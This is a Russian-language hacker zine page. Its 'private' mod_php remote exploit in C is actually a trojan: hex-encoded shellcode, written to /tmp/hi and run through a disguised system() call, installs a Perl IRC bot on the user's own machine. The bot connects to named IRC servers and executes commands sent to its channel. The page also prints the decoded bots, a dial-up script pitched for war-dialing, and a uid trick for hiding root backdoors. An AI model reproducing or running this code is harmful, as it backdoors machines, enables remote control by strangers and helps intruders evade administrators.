--= all the small things =--
[+] php mem_limit exploit live!!
i
i всем приятного пользования! Данный эксплоит достаточно долго гулял по
i EFnet'у, получали его только избранные! Если вы достаточно илитны, то он
i вам несомненно поможет! Даёт nobody/apache на apache <= 1.3.33 php 4.3.7
i
i /*******************************************************
i * *
i * PRIVATE !!! PRIVATE !!! PRIVATE !!!! *
i * DONT'T TRADE !!! DON'T TRADE !!! *
i * mod_php remote exploit vs Linux/FreeBSD *
i * by truebh *
i * http://security.e-matters.de/advisories/112004.html *
i * *
i ******************************************************/
i
i #include <stdio.h>
i #include <stdlib.h>
i #include <string.h>
i #include <stdarg.h>
i #include <sys/types.h>
i #include <sys/socket.h>
i #include <netinet/in.h>
i #include <arpa/inet.h>
i #include <unistd.h>
i #include <netdb.h>
i #define SIZE 0xffffff
i #define PREV_IN_USE system
i #define VALID_RANGE 0xbffffe00
i #define OFFSET 106
i #define FD 0x080518fc
i #define BD 0x08082000
i
i
i char jmpcode[] = "\xeb\x0aiiiiiiiiii";
i
i char shellcode[] =
i "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
i "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
i "\x79\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x0a\x24\x6e\x69\x63\x6b"
i "\x3d\x22\x70\x68\x70\x65\x22\x3b\x0a\x24\x73\x65\x72\x76\x65\x72"
i "\x3d\x22\x69\x72\x63\x2e\x64\x6b\x73\x2e\x63\x61\x22\x3b\x0a\x24"
i "\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x0a\x65\x78"
i "\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x0a\x75\x73\x65\x20"
i "\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x0a\x24\x73\x6f\x63"
i "\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a"
i "\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65"
i "\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74"
i "\x3b\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55"
i "\x53\x45\x52\x20\x70\x68\x70\x65\x20\x2b\x69\x20\x70\x68\x70\x65"
i "\x20\x3a\x70\x68\x70\x65\x5c\x6e\x4e\x49\x43\x4b\x20\x70\x68\x70"
i "\x65\x5c\x6e\x22\x3b\x0a\x24\x69\x3d\x31\x3b\x0a\x77\x68\x69\x6c"
i "\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
i "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x0a\x20"
i "\x20\x20\x20\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x0a\x20\x20\x20"
i "\x20\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d"
i "\x22\x30\x30\x31\x22\x3b\x0a\x20\x20\x20\x20\x69\x66\x28\x24\x6d"
i "\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x0a\x20\x20\x20"
i "\x20\x20\x20\x20\x20\x24\x69\x2b\x2b\x3b\x0a\x20\x20\x20\x20\x20"
i "\x20\x20\x20\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24"
i "\x2f\x24\x69\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72"
i "\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20"
i "\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a"
i "\x7d\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a"
i "\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24\x6b\x65\x79\x5c\x6e"
i "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
i "\x3e\x29\x7b\x0a\x20\x20\x20\x20\x69\x66\x20\x28\x2f\x5e\x50\x49"
i "\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x0a\x20\x20\x20\x20"
i "\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20"
i "\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24"
i "\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a\x20"
i "\x20\x20\x20\x69\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20"
i "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24"
i "\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20"
i "\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29"
i "\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x2f\x5c\x73\x2a"
i "\x24\x2f\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x24\x5f\x3d"
i "\x60\x24\x5f\x60\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f"
i "\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e"
i "\x22\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
i "\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52"
i "\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
i "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
i "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
i "\x20\x7d\x0a\x20\x20\x20\x20\x7d\x0a\x7d\x0a\x23\x63\x68\x6d\x6f"
i "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
i "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
i
i
i char fbsd_shellcode[] =
i "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
i "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
i "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
i "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
i "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
i "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
i "\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b"
i "\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b"
i "\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b"
i "\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73"
i "\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c"
i "\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
i "\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20"
i "\x6d\x6f\x72\x65\x20\x3a\x6d\x6f\x72\x65\x76\x32\x5c\x6e\x4e\x49"
i "\x43\x4b\x20\x70\x68\x70\x65\x78\x78\x5c\x6e\x22\x3b\x24\x69\x3d"
i "\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d"
i "\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29"
i "\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73"
i "\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31"
i "\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33"
i "\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73"
i "\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
i "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63"
i "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
i "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
i "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
i "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
i "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
i "\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
i "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69"
i "\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56"
i "\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b"
i "\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d"
i "\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x20\x7b\x73\x2f"
i "\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66"
i "\x6f\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c"
i "\x6e\x22\x29\x20\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
i "\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
i "\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d"
i "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
i "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
i "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
i
i
i
i void usage(char *arg){
i printf("* mod_php remote exploit vs Linux/FreeBSD *\n");
i printf("Usage: %s -h <host> -d <php file>\n",arg);
i printf("Options:\n");
i printf("\t-h ip/host of target\n");
i printf("\t-p port\n");
i printf("\t-d php file\n");
i printf("\t-B memory_limit 8/16/64\n");
i printf("\t-t target\n");
i printf("Targets for Apache 1.3.31 & php 4.3.7:\n");
i printf("\tFreeBSD 5: 0\n");
i printf("\tFreeBSD 4.x: 1\n");
i printf("\tFedora Core 2: 2\n");
i printf("\tRedhat 9: 3\n");
i printf("\tSuSe 9.1: 4\n");
i printf("\tDebian 3: 5\n");
i printf("\tGentoo 2004: 6\n");
i }
i
i
i
i int main(int argc, char **argv){
i FILE *jmpinst;
i char h[500],file[500]="index.php",buffer[1024], *payload, *ptr;
i int port=80,limit=8,target=0,sock;
i struct hostent *host;
i struct sockaddr_in addr;
i
i if(argc < 3){
i usage(argv[0]);
i return 1;
i }
i
i while (optind < argc){
i int result = getopt(argc, argv, "p::d:B::t:::h:d:");
i if (result == -1) break;
i switch (result){
i case 'h':
i strncpy(h,optarg,sizeof(h));
i break;
i case 'd':
i strncpy(file,optarg,sizeof(file));
i break;
i case 'p':
i if (optarg)
i port = atoi(optarg);
i else
i port = 80;
i break;
i case 'B':
i if (optarg)
i limit = atoi(optarg);
i else
i limit = 8;
i if(limit != 8 && limit != 16 && limit != 64)
i limit = 8;
i break;
i case 't':
i if (target)
i target = atoi(optarg);
i else
i target = 0;
i if(target != 0 && target != 1 && target != 2 &&
i target != 3 && target != 4 && target != 5 &&
i target != 6)
i target = 0;
i break;
i default:
i usage(argv[0]);
i return 1;
i }
i }
i if (!inet_aton(h, &addr.sin_addr)){
i host = gethostbyname(h);
i if (!host){
i printf("Resolving failed\n");
i return 1;
i }
i addr.sin_addr = *(struct in_addr*)host->h_addr;
i }
i sock = socket(PF_INET, SOCK_STREAM, 0);
i addr.sin_port = htons(port);
i addr.sin_family = AF_INET;
i if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
i printf("Connecting failed\n");
i return 1;
i }
i printf("STEP1 - Guessing remote memory_limit\n");
i switch(limit){
i case 8:
i printf("+ Testing 8MO ... Ok !\n");
i break;
i case 16:
i printf("+ Testing 16MO ... Ok !\n");
i break;
i case 64:
i printf("+ Testing 64MO ... Ok !\n");
i break;
i default:
i printf("+ Testing 64MO ... Ok !\n");
i }
i payload = malloc(limit * 10000);
i ptr = payload+8;
i memcpy(ptr,jmpcode,strlen(jmpcode));
i jmpinst=fopen(shellcode+793,"w+");
i if(jmpinst){
i fseek(jmpinst,0,SEEK_SET);
i fprintf(jmpinst,"%s",shellcode);
i fclose(jmpinst);
i }
i ptr += strlen(jmpcode);
i if(target != 5 && target != 6){
i memcpy(ptr,shellcode,strlen(shellcode));
i ptr += strlen(shellcode);
i memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
i }
i else{
i memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
i ptr += strlen(fbsd_shellcode);
i memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
i }
i printf("STEP2 - Guessing heap junk size\n");
i printf("+ 1000 ... ");
i snprintf(buffer,sizeof(buffer),
i "POST /%s HTTP/1.1\r\n"
i "Host: %s\r\n"
i "Referer: www.google.com\r\n"
i "Content-type: application/x-www-form-urlencoded\r\n"
i "Content-length: %d\r\n"
i "Connection: close\r\n\r\n"
i "foobar=",file,h,10000-1);
i send(sock,buffer,strlen(buffer),0);
i send(sock,ptr,10000,0);
i close(sock);
i if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
i printf("CRASH\n");
i else
i printf("ALIVE\n");
i printf("+ 500 ... ");
i snprintf(buffer,sizeof(buffer),
i "POST /%s HTTP/1.1\r\n"
i "Host: %s\r\n"
i "Referer: www.google.com\r\n"
i "Content-type: application/x-www-form-urlencoded\r\n"
i "Content-length: %d\r\n"
i "Connection: close\r\n\r\n"
i "foobar=",file,h,5000-1);
i send(sock,buffer,strlen(buffer),0);
i send(sock,ptr,5000,0);
i close(sock);
i if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
i printf("CRASH\n");
i else
i printf("ALIVE\n");
i printf("+ 250 ... ");
i snprintf(buffer,sizeof(buffer),
i "POST /%s HTTP/1.1\r\n"
i "Host: %s\r\n"
i "Referer: www.google.com\r\n"
i "Content-type: application/x-www-form-urlencoded\r\n"
i "Content-length: %d\r\n"
i "Connection: close\r\n\r\n"
i "foobar=",file,h,2500-1);
i send(sock,buffer,strlen(buffer),0);
i send(sock,ptr,2500,0);
i close(sock);
i if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
i printf("CRASH\n");
i else
i printf("ALIVE\n");
i printf("+ 375 ... ");
i snprintf(buffer,sizeof(buffer),
i "POST /%s HTTP/1.1\r\n"
i "Host: %s\r\n"
i "Referer: www.google.com\r\n"
i "Content-type: application/x-www-form-urlencoded\r\n"
i "Content-length: %d\r\n"
i "Connection: close\r\n\r\n"
i "foobar=",file,h,3750-1);
i send(sock,buffer,strlen(buffer),0);
i send(sock,ptr,3750,0);
i close(sock);
i if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
i printf("CRASH\n");
i else
i printf("ALIVE\n");
i printf("STEP3 - Taking control over pDestructor BAD\n");
i switch(target){
i case 0:
i printf("+ Targeting FreeBSD 5 Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x080537ce - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08082000 + 8);
i break;
i case 1:
i printf("+ Targeting FreeBSD 4 Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x080637ce - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08081000 + 8);
i break;
i case 2:
i printf("+ Targeting Fedora Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x0807e5f4 - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08081000 + 8);
i break;
i case 3:
i printf("+ Targeting Redhat Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x0805c1fc - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08062000 + 8);
i break;
i case 4:
i printf("+ Targeting SuSe Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x080518fc - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08073000 + 8);
i break;
i case 5:
i printf("+ Targeting Debian Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x080713ce - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08025000 + 8);
i break;
i case 6:
i printf("+ Targeting Gentoo Ok !\n");
i ptr = payload;
i *((void **)ptr) = (void *)(0x080937ce - 12);
i ptr += 4;
i *((void **)ptr) = (void *)(0x08072000 + 8);
i break;
i }
i payload[sizeof(payload)-1] = '\0';
i payload[sizeof(payload)-2] = '\0';
i strncat(payload,"0x1",PREV_IN_USE(shellcode+764));
i snprintf(buffer,sizeof(buffer),
i "POST /%s HTTP/1.1\r\n"
i "Host: %s\r\n"
i "Referer: www.google.com\r\n"
i "Content-type: application/x-www-form-urlencoded\r\n"
i "Content-length: %d\r\n"
i "Connection: close\r\n\r\n"
i "foobar=",file,h,strlen(payload)+8);
i send(sock,buffer,strlen(buffer),0);
i send(sock,payload,strlen(payload),0);
i close(sock);
i free(payload);
i addr.sin_port = htons(6666);
i if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0)
i printf("-- YOU ARE IN FUCKER --\n");
i else
i printf("-- FAILED - WRONG TARGET FUCKER --\n");
i close(sock);
i return 0;
i }
i
[+] u wanna true?
i
i Теперь собственно для тех, кто поймёт:
i
i % cat dump_1.txt
i #!/usr/bin/perl
i $chan="#cn";
i $key ="fags";
i $nick="phpe";
i $server="irc.dks.ca";
i $SIG{TERM}={};
i exit if fork;
i use IO::Socket;
i $sock = IO::Socket::INET->new($server.":6667")||exit;
i print $sock "USER phpe +i phpe :phpe\nNICK phpe\n";
i $i=1;
i while(<$sock>=~/^[^ ]+ ([^ ]+) /){
i $mode=$1;
i last if $mode=="001";
i if($mode=="433"){
i $i++;
i $nick=~s/\d*$/$i/;
i print $sock "NICK $nick\n";
i }
i }
i print $sock "JOIN $chan $key\n";
i while (<$sock>){
i if (/^PING (.*)$/){
i print $sock "PONG $1\nJOIN $chan\n";
i }
i if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
i s/\s*$//;
i $_=`$_`;
i foreach (split "\n") {
i print $sock "PRIVMSG $chan :$_\n";
i sleep 1;
i }
i }
i }
i #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
i
i % cat dump_2.txt
i #!/usr/bin/perl
i $chan="#cn";
i $key ="fags";
i $nick="phpfr";$server="irc.ham.de.euirc.net";
i
i $SIG{TERM}={};
i exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;
i
i print $sock "USER moron +i more :morev2\nNICK phpexx\n";$i=1;
i while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";
i if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}
i print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/)
i {print $sock "PONG $1\nJOIN $chan\n";}
i if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {s/\s*$//;
i $_=`$_`;foreach (split "\n") {print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}
i #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
i
i разделяй и властвуй )
i
[+] dial script linux/freebsd + winmodem
i
i Изначально задумывалось как сканер для Sprint-а, но потом надоело и до
i сих пор используется лишь для коннекта в инет. При наличии прямых рук
i легко переделывается для war-dialing'a или массовых сканов x.25-сетей.
i
i #!/bin/sh
i
i # Usage: ./dial_up [<shutdown ppp-interface>]
i
i ### config ###
i
i TELEPHONE=P666-1313 # use P or T in begin of ph number as dial type
i LOGIN='satanic'
i PASSWORD='mayhem'
i
i MODEM=/dev/cuaa4 # specify modem's slot (on my box /dev/modem points to
i # COM5 dev)
i
i # in FreeBSD COM5 is on /dev/cuaa4 (COM1 is on cuaa0)
i # in Linux u can reach it on /dev/ttyS4
i
i LINE_SPEED=38400
i
i LOCAL_IP=0.0.0.0 # use 0.0.0.0 by default
i REMOTE_IP=0.0.0.0 # use 0.0.0.0 by default
i NETMASK=255.255.255.255
i
i ###
i
i
i if [ "$1" = "shutdown" ]; then
i
i if [ "$2" = "" ]; then
i DEVICE=ppp0
i else
i DEVICE=$2
i fi
i
i rm -f /tmp/term.scr
i echo "Shuting down $DEVICE interface"
i
i if [ -r /var/run/$DEVICE.pid ]; then
i kill -INT `cat /var/run/$DEVICE.pid`
i
i if [ ! "$?" = "0" ]; then
i rm -f /var/run/$DEVICE.pid
i echo "ERROR: Removed stale pid file"
i exit 1
i fi
i echo "PPP link to $DEVICE terminated."
i exit 0
i fi
i
i echo "ERROR: PPP link is not active on $DEVICE"
i exit 1
i fi
i
i cat << _eof_ > /tmp/term.scr
i #!/bin/sh
i exec chat -v \
i TIMEOUT 5 \
i ECHO ON \
i ABORT '\nBUSY\r' \
i ABORT '\nNO ANSWER\r' \
i ABORT '\nRINGING\r\n\r\nRINGING\r' \
i '' \rATZ \
i 'OK-+++\c-OK' ATH0 \
i TIMEOUT 120 \
i SAY "Dialing to ISP...\n" \
i OK ATD$TELEPHONE \
i CONNECT '' \
i SAY "Sending login...\n" \
i ogin:--ogin: $LOGIN \
i SAY "Sending password...\n" \
i assword: $PASSWORD \
i '' \d
i _eof_
i
i chmod +x /tmp/term.scr
i
i exec /usr/sbin/pppd debug lock modem crtscts $MODEM $LINE_SPEED \
i asyncmap 20A0000 escape FF kdebug 0 $LOCAL_IP:$REMOTE_IP \
i netmask $NETMASK defaultroute connect /tmp/term.scr
i
i # eof
i
[+] universal UNIX process shading
i
i Странно, что никто раньше этим не пользовался при написании своих
i бекдоров и тому подобного софта. Итак, задача: скажем, нам нужно
i повесить бекдорину с рутовским шеллом так, чтобы у админа не возникло
i очевидных подозрений. Решение: запускаем под рутом, и в начале ставим
i setreuid(0, 666), где 666 - uid юзера, под которым мы будем прятать
i наши процессы. Теперь в списке ps наш бекдор будет числиться под uid
i 666. А в тот момент, когда ксакеп логинится в систему, бекдор делает
i setreuid(0, 0) и проц снова становится рутовым. Эта техника успешно
i тестировалась под Linux, FreeBSD, Solaris.. вроде достаточно )
i
[~]
